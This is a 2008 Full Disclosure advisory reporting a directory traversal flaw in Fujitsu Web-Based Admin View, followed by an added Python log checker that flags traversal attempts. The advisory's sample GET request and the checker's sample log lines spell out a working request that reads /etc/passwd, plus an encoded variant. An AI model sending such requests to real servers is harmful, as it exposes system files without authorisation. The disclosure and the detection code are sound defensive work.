Full Disclosure mailing list archives
Fujitsu Web-Based Admin View Directory Traversal Vulnerability
From: "Deniz Cevik" <Deniz.Cevik () intellect com tr>
Date: Thu, 21 Aug 2008 16:34:00 +0300
Fujitsu Web-Based Admin View Directory Traversal Vulnerability

Version: 2.1.2 on Solaris. Other versions may be vulnerable.
Vulnerability: Directory Traversal
Risk: Critical

Description:
Due to insufficient control of user inputs, Fujitsu Web-based admin view reveals content of files residing in folders other than webroot. This will allow an attacker to view arbitrary local files within the context of the web server.

Sample Request:

GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0
Host: target:8081

Deniz CEVIK
www.intellectpro.com.tr
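Added example, not part of the original advisory or of any Fujitsu code: a log check that resolves dot segments in each request target and flags any that step above the document root, which catches the interleaved "/.././" form in the sample request that a literal "../../" match would miss. It also decodes percent-encoded dots, which goes beyond the one request shown. The Common Log Format lines, the addresses and the function names are constructed for illustration; the product's real log format is an assumption.

```python
import re
from urllib.parse import unquote

# Request line inside a Common Log Format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/\d\.\d"')

def climbs_above_root(target: str) -> bool:
    """True if the path part of `target` walks above "/" at any point."""
    path = target.split("?", 1)[0]
    # Decode a bounded number of times so encoded dot segments are seen too.
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    depth = 0
    for segment in re.split(r"[/\\]+", path):
        if segment in ("", "."):
            continue            # empty and "." segments do not change depth
        if segment == "..":
            depth -= 1
            if depth < 0:       # stepped out of the document root
                return True
        else:
            depth += 1
    return False

def flag_traversal(log_lines):
    """Return the request targets in `log_lines` that climb above the root."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m and climbs_above_root(m.group(1)):
            hits.append(m.group(1))
    return hits

# Constructed sample log lines (192.0.2.0/24 is a documentation range).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Aug/2008:16:40:01 +0300] "GET /index.html HTTP/1.0" 200 512',
    '192.0.2.10 - - [21/Aug/2008:16:40:02 +0300] "GET /docs/../index.html HTTP/1.0" 200 512',
    '192.0.2.77 - - [21/Aug/2008:16:41:10 +0300] "GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0" 200 1374',
    '192.0.2.77 - - [21/Aug/2008:16:41:12 +0300] "GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for target in flag_traversal(SAMPLE_LOG):
        print("traversal attempt:", target)
```

A flagged request that was answered with status 200 is the case to investigate first, since it suggests file content was actually returned.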